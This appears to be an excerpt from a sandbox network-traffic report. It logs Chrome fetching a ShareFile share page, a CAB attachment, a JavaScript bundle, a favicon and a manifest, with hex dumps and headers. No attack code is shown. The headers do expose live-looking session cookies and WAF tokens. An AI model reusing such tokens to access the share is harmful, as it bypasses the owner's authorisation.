                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:27 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      139192.168.2.175360576.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1366OUTGET /bundles/e0aa737e437fa075dfed.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; AWSALBTGCORS=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; AWSALB=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM; AWSALBCORS=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1430INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:28 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 25648
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=X7VtlrLbn2+KsAMd8p0jB/ODcuvrjHTruAFpA5rXcYw1eMhTW1AqHMmpwz+HMl4wyhPhBdc0HnW5i6JH83AQad0Xa8tXPUL71mQwybl02F39MmClCqGW9TkaxeBHgzjCrcbTdLnfZoRDgESEYAFEw1N/EC29ftuTqjd0GEnvtVQG; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=X7VtlrLbn2+KsAMd8p0jB/ODcuvrjHTruAFpA5rXcYw1eMhTW1AqHMmpwz+HMl4wyhPhBdc0HnW5i6JH83AQad0Xa8tXPUL71mQwybl02F39MmClCqGW9TkaxeBHgzjCrcbTdLnfZoRDgESEYAFEw1N/EC29ftuTqjd0GEnvtVQG; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=v2iwcOlvIJO2lbnujiluD6HvTqLUlPcY0sAS0ziYUTq3Xk9m3F8X0kSIF3R17un3OvCsQbS0E+NMVUYR/qNd2a/5T6XRMk0tM6KkfkKORUFbHKUnaq+yzgb3z2mj; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=v2iwcOlvIJO2lbnujiluD6HvTqLUlPcY0sAS0ziYUTq3Xk9m3F8X0kSIF3R17un3OvCsQbS0E+NMVUYR/qNd2a/5T6XRMk0tM6KkfkKORUFbHKUnaq+yzgb3z2mj; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c4bb0"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC14954INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 39 39 36 5d 2c 7b 37 33 39 39 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 43 6f 6e 66 69 72 6d 44 69 61 6c 6f 67 22 3a 7b 22 63 61 6e 63 65 6c 22 3a 22 43 61 6e 63 65 6c 22 2c 22 63 6f 6e 74 69 6e 75 65 22 3a 22 43 6f 6e 74 69 6e 75 65 22 2c 22 63 6f 6e 74 69 6e 75 65 5f 61 6e 79 77 61 79 22 3a 22 43 6f 6e 74 69
                                                                                                                                                                                                                      Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[3996],{73996:function(e){e.exports=JSON.parse('{"ConfirmDialog":{"cancel":"Cancel","continue":"Continue","continue_anyway":"Conti
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC10694INData Raw: 65 6e 63 72 79 70 74 65 64 20 65 6d 61 69 6c 22 2c 22 72 65 71 75 65 73 74 5f 66 69 6c 65 73 22 3a 22 48 6f 77 20 74 6f 20 72 65 71 75 65 73 74 20 66 69 6c 65 73 22 2c 22 73 65 63 75 72 65 6c 79 5f 73 68 61 72 65 5f 6c 69 6e 6b 73 5f 74 6f 5f 66 69 6c 65 73 22 3a 22 48 6f 77 20 74 6f 20 73 65 63 75 72 65 6c 79 20 73 68 61 72 65 20 6c 69 6e 6b 73 20 74 6f 20 66 69 6c 65 73 22 2c 22 73 68 61 72 65 5f 61 5f 66 69 6c 65 22 3a 22 48 6f 77 20 74 6f 20 73 68 61 72 65 20 61 20 66 69 6c 65 22 2c 22 73 68 61 72 65 5f 61 5f 66 69 6c 65 5f 76 69 61 5f 6c 69 6e 6b 22 3a 22 48 6f 77 20 74 6f 20 73 68 61 72 65 20 61 20 66 69 6c 65 20 76 69 61 20 6c 69 6e 6b 22 2c 22 75 70 6c 6f 61 64 5f 61 5f 66 69 6c 65 22 3a 22 48 6f 77 20 74 6f 20 75 70 6c 6f 61 64 20 61 20 66 69 6c
                                                                                                                                                                                                                      Data Ascii: encrypted email","request_files":"How to request files","securely_share_links_to_files":"How to securely share links to files","share_a_file":"How to share a file","share_a_file_via_link":"How to share a file via link","upload_a_file":"How to upload a fil


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      140192.168.2.175360776.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1646OUTGET /favicon-32x32.png HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; AWSALBTGCORS=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; AWSALB=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM; AWSALBCORS=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1416INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:28 GMT
                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                      Content-Length: 1187
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=iKTi1cjAhq7ITp9PlkuKSxLqGMR2xyovmRD7tMf961keG8e1ONsRecTDM6HjEorTlPlHkyupH/c/epTQaOK4BgFGZdwb6Y60RZ7xoL9lEXM3AWs6E17N8hZE7AzRNHMb0NiMwotFyE8EUyT2vgC8EehPRTfkLk+Msrbd5c7xxhO3; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=iKTi1cjAhq7ITp9PlkuKSxLqGMR2xyovmRD7tMf961keG8e1ONsRecTDM6HjEorTlPlHkyupH/c/epTQaOK4BgFGZdwb6Y60RZ7xoL9lEXM3AWs6E17N8hZE7AzRNHMb0NiMwotFyE8EUyT2vgC8EehPRTfkLk+Msrbd5c7xxhO3; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=1y44zkMuJqq+/KvVdxdxugljIs8J/ldk0zH1x0IBX8QdiNv774gKMhTODWSyy34ILTEGl11Gg5BQAK+Mt8FueKcntilAdjQNdp6RpINBsZEbPjINAyvzqk/N87v5; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=1y44zkMuJqq+/KvVdxdxugljIs8J/ldk0zH1x0IBX8QdiNv774gKMhTODWSyy34ILTEGl11Gg5BQAK+Mt8FueKcntilAdjQNdp6RpINBsZEbPjINAyvzqk/N87v5; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c2b23"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1187INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 09 d7 00 00 09 d7 01 b1 6e 17 b7 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 04 30 49 44 41 54 58 85 d5 97 5f 4c 53 67 18 c6 7f b4 b4 25 d0 93 80 55 c3 0c 6c 85 60 48 b8 9a 96 62 32 2d e1 af 94 09 84 5b 20 f3 82 04 37 d4 0d ee 46 8b 91 cd 44 91 25 2c 71 73 3a e3 ec 2d b2 01 21 e5 d2 56 63 50 e7 70 a0 24 04 21 21 fc 6b 98 33 62 8c 11 8a 50 eb bb 0b b4 8b f6 b0 76 48 42 7c 92 2f 39 e7 fd be f3 bc ef 79 be e7 bc e7 9c 18 a3 a2 08 9b 08 cd 66 26 7f ff 0b 48 4c 4c c4 6a b5 6e 5e 01 0e 87 03 af c7 43 59 59 d9 ba 39 62 d6 6b c2 cc cc 4c 7e bf 75 8b bf 1f 3e 24 db
                                                                                                                                                                                                                      Data Ascii: PNGIHDR szzpHYsntEXtSoftwarewww.inkscape.org<0IDATX_LSg%Ul`Hb2-[ 7FD%,qs:-!VcPp$!!k3bPvHB|/9yf&HLLjn^CYY9bkL~u>$


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      141192.168.2.175361076.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC546OUTOPTIONS /sf/v3/Accounts/Branding HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sf-api.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Access-Control-Request-Method: GET
                                                                                                                                                                                                                      Access-Control-Request-Headers: correlationid,x-sf-app,x-sf-clientcapabilities
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1501INHTTP/1.1 204 No Content
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:28 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=LbVRnUrQtWBznWzPEWGDqwafZmG/tTX/21xC+8/OUtlp6JqvQFy5Qd6pIP6g0RQiJvYUt/su1ijmFrUuY6fsHCxzs9TaYOP9m44dN6vB2F7UaB5Spj3MNtiCPotV1c0eX/nVE+migf8z3eIaMhAok993AiWOE4k+J+zbEfPCBFIP; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=LbVRnUrQtWBznWzPEWGDqwafZmG/tTX/21xC+8/OUtlp6JqvQFy5Qd6pIP6g0RQiJvYUt/su1ijmFrUuY6fsHCxzs9TaYOP9m44dN6vB2F7UaB5Spj3MNtiCPotV1c0eX/nVE+migf8z3eIaMhAok993AiWOE4k+J+zbEfPCBFIP; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=kahGo6nk/h7xrcI2UD63IwxfHfo0Pr48NxnAIx7/vF53OZfD2eqfNv3zQA8xq3ZmYmPh+S7fkKvz/kQ03hM5T8uZeoG3Fh8DC0+SWi8q+nmF3q2rpUp+DVotpAvE; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=kahGo6nk/h7xrcI2UD63IwxfHfo0Pr48NxnAIx7/vF53OZfD2eqfNv3zQA8xq3ZmYmPh+S7fkKvz/kQ03hM5T8uZeoG3Fh8DC0+SWi8q+nmF3q2rpUp+DVotpAvE; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                      Access-Control-Allow-Headers: Content-Type,Accept,Accept-Language,Authorization,Origin,X-HTTP-Method-Override,X-SF-App,X-SFAPI-Tool,X-SFAPI-ToolVersion,X-SF-CaptchaUserToken,X-SF-ClientCapabilities,X-SF-LimitedAuthId,CorrelationId
                                                                                                                                                                                                                      Access-Control-Allow-Methods: DELETE,GET,HEAD,OPTIONS,PATCH,POST,PUT
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Access-Control-Max-Age: 600
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      X-SFAPI-RequestID: lj_zHN_zvUmR7eoyc_OESA


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      142192.168.2.175360676.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC599OUTGET /manifest.json HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1422INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:28 GMT
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Content-Length: 533
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=4arfFI/01PPyeDwOXastZDK5JFnjZf2KE/RBtAjIu3QQS9v5D7hyRgJdu8wXbe5ScWKzhufZsq6uGqIIP9nD/AiDPdJMI5g4r/vX/ErBdCT0f3GuptTSjW2LMbDgYza/lszB1kYvuhx/VsvZMWD2r5ZWeX8vzKl7Dk5MIYxOiX4W; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=4arfFI/01PPyeDwOXastZDK5JFnjZf2KE/RBtAjIu3QQS9v5D7hyRgJdu8wXbe5ScWKzhufZsq6uGqIIP9nD/AiDPdJMI5g4r/vX/ErBdCT0f3GuptTSjW2LMbDgYza/lszB1kYvuhx/VsvZMWD2r5ZWeX8vzKl7Dk5MIYxOiX4W; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=mLcldR/nEbzD51lU5pgx7CwC5X8ulgQvGxhob9ylmaxXDyeSBc9HJ/ejpohHxUEQVb7f9QqKGtQIf2+hfuOZa47MAFL1axId6Xak8m0R14erl6O+wdsCFPqdXsHU; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=mLcldR/nEbzD51lU5pgx7CwC5X8ulgQvGxhob9ylmaxXDyeSBc9HJ/ejpohHxUEQVb7f9QqKGtQIf2+hfuOZa47MAFL1axId6Xak8m0R14erl6O+wdsCFPqdXsHU; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c2d95"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC533INData Raw: 7b 0a 09 22 6e 61 6d 65 22 3a 20 22 53 68 61 72 65 46 69 6c 65 22 2c 0a 09 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 20 22 53 68 61 72 65 46 69 6c 65 22 2c 0a 09 22 69 63 6f 6e 73 22 3a 20 5b 0a 09 09 7b 0a 09 09 09 22 73 72 63 22 3a 20 22 2f 61 6e 64 72 6f 69 64 2d 63 68 72 6f 6d 65 2d 31 39 32 78 31 39 32 2e 70 6e 67 22 2c 0a 09 09 09 22 73 69 7a 65 73 22 3a 20 22 31 39 32 78 31 39 32 22 2c 0a 09 09 09 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 09 09 7d 2c 0a 09 09 7b 0a 09 09 09 22 73 72 63 22 3a 20 22 2f 61 6e 64 72 6f 69 64 2d 63 68 72 6f 6d 65 2d 35 31 32 78 35 31 32 2e 70 6e 67 22 2c 0a 09 09 09 22 73 69 7a 65 73 22 3a 20 22 35 31 32 78 35 31 32 22 2c 0a 09 09 09 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 09 09 7d 0a
                                                                                                                                                                                                                      Data Ascii: {"name": "ShareFile","short_name": "ShareFile","icons": [{"src": "/android-chrome-192x192.png","sizes": "192x192","type": "image/png"},{"src": "/android-chrome-512x512.png","sizes": "512x512","type": "image/png"}


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      143192.168.2.175360952.206.112.1294437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC555OUTOPTIONS /events/diagnostic/5f33f5d44f29ea099db90d2a HTTP/1.1
                                                                                                                                                                                                                      Host: events.launchdarkly.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                      Access-Control-Request-Headers: content-type,x-launchdarkly-user-agent
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
